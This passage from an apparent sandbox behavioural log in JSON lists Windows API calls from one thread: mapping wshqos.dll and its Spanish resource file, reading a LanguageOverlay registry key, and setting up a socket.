"parentcaller": "0x7718939e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000048c" } ], "repeated": 0, "id": 905 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771898a9", "parentcaller": "0x7718939e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "SectionOffset", "value": "0x043cd7e0" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 906 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771898b9", "parentcaller": "0x7718939e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 907 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771aa99a", "parentcaller": "0x771aa8d0", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "RegionSize", "value": "0x00004000" } ], "repeated": 0, "id": 908 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771aa9a8", "parentcaller": "0x771aa8d0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 909 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e279c", "parentcaller": "0x76ff904d", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "RegionSize", "value": "0x00007000" } ], "repeated": 0, "id": 910 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" } ], "repeated": 0, "id": 911 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e09db", "parentcaller": "0x764e04de", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 912 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e1ffa", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "DesiredAccess", "value": "0x00000005", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000048c" } ], "repeated": 0, "id": 913 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e2043", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00000490" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00007000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 914 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e209b", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 915 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x764e20a2", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 916 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771a2450", "parentcaller": "0x77188ea8", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 917 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x7725b8de", "parentcaller": "0x771ea78a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 918 }, { "timestamp": "2025-02-27 23:34:22,847", "thread_id": "11036", "caller": "0x771ea7e5", "parentcaller": "0x77188ea8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 919 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 920 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x77189881", "parentcaller": "0x7718939e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000498" } ], "repeated": 0, "id": 921 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898a9", "parentcaller": "0x7718939e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "SectionOffset", "value": "0x043cd7e0" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 922 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898b9", "parentcaller": "0x7718939e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 923 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa99a", "parentcaller": "0x771aa8d0", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "RegionSize", "value": "0x00004000" } ], "repeated": 0, "id": 924 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa9a8", "parentcaller": "0x771aa8d0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 925 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e279c", "parentcaller": "0x76ff904d", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "RegionSize", "value": "0x00007000" } ], "repeated": 0, "id": 926 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" } ], "repeated": 0, "id": 927 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e09db", "parentcaller": "0x764e04de", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 928 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e1ffa", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "DesiredAccess", "value": "0x00000005", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000498" } ], "repeated": 0, "id": 929 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e2043", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00007000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 930 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e209b", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 931 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e20a2", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 932 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771a2450", "parentcaller": "0x77188ea8", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 933 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7725b8de", "parentcaller": "0x771ea78a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000498" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 934 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771ea7e5", "parentcaller": "0x77188ea8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 935 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 936 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x77189881", "parentcaller": "0x7718939e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000498" } ], "repeated": 0, "id": 937 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898a9", "parentcaller": "0x7718939e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "SectionOffset", "value": "0x043cd7e0" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 938 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898b9", "parentcaller": "0x7718939e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 939 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa99a", "parentcaller": "0x771aa8d0", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "RegionSize", "value": "0x00004000" } ], "repeated": 0, "id": 940 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa9a8", "parentcaller": "0x771aa8d0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 941 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e279c", "parentcaller": "0x76ff904d", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "RegionSize", "value": "0x00007000" } ], "repeated": 0, "id": 942 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7719566b", "parentcaller": "0x764e1f4e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" } ], "repeated": 0, "id": 943 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e09db", "parentcaller": "0x764e04de", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wshqos.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 944 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e1ffa", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "DesiredAccess", "value": "0x00000005", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000498" } ], "repeated": 0, "id": 945 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e2043", "parentcaller": "0x764e1ca7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00007000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 946 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e209b", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 947 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e20a2", "parentcaller": "0x764e1ca7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 948 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771a2450", "parentcaller": "0x77188ea8", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 949 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7725b8de", "parentcaller": "0x771ea78a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000498" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 950 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771ea7e5", "parentcaller": "0x77188ea8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 951 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x7718940b", "parentcaller": "0x77189837", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\wshqos.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 952 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x77189881", "parentcaller": "0x7718939e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000498" } ], "repeated": 0, "id": 953 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898a9", "parentcaller": "0x7718939e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000049c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "SectionOffset", "value": "0x043cd7e0" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 954 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771898b9", "parentcaller": "0x7718939e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 955 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa99a", "parentcaller": "0x771aa8d0", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047f0000" }, { "name": "RegionSize", "value": "0x00004000" } ], "repeated": 0, "id": 956 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771aa9a8", "parentcaller": "0x771aa8d0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 957 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x764e279c", "parentcaller": "0x76ff904d", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x047e0000" }, { "name": "RegionSize", "value": "0x00007000" } ], "repeated": 0, "id": 958 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00754000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 959 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 960 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 961 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 962 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xc9\\xe8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 963 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 964 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 965 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 966 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": 